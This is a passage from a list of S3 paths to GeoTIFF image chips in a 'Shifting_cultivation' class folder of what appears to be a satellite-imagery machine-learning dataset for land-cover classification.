's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_3100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_3200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_3900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_4000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_4100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_4200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1400_1000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1400_1100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1400_1200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1400_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1400_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1400_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1400_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1400_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1400_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1400_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1400_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1400_3900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1400_400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1400_4000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1400_4100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1400_500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1400_600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1400_700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1400_800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1400_900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_1000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_1100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_1200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_2000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_2100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_2200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_2300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_3100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_3200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_3900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_4000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_4100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_1100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_1200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_1300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_1400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_2000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_2100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_2200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_2300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_3100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_3200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_3900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_4000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1700_1100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1700_1200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1700_1300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1700_1400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1700_1700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1700_1800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1700_1900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1700_2000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1700_2100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1700_2200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1700_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1700_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1700_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1700_3100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1700_3200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1700_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1700_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1700_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1700_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1700_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1700_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1700_3900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_1100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_1200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_1300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_1400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_1500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_1600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_1700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_1800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_1900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_2000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_2100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_2200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_2300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_3000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_3100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_3200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_3900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_1200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_1300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_1400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_1500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_1600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_1700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_1800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_1900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_2000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_2100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_2200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_2300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_2900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_3000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_3100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_3200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_3900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_1400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_1500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_1600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_1700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_1800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_1900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_2000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_2100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_2200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_2300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_2900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_3000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_3100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_3200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_200_500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_200_600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_200_700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2100_2000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2100_2100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2100_2200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2100_2300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2100_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2100_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2100_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2100_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2100_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2100_2900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2100_3000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2100_3100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2100_3200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2100_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2100_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2200_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2200_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2200_3000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_300_1000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_300_400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_300_500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_300_600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_300_700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_300_800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_300_900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_400_1000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_400_1100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_400_400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_400_500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_400_600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_400_700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_400_800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_400_900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_500_1000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_500_1100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_500_1200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_500_1300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_500_400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_500_500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_500_600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_500_700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_500_800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_500_900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_600_1000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_600_1100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_600_1200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_600_1300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_600_1400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_600_400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_600_500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_600_600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_600_700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_600_800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_600_900.tif', 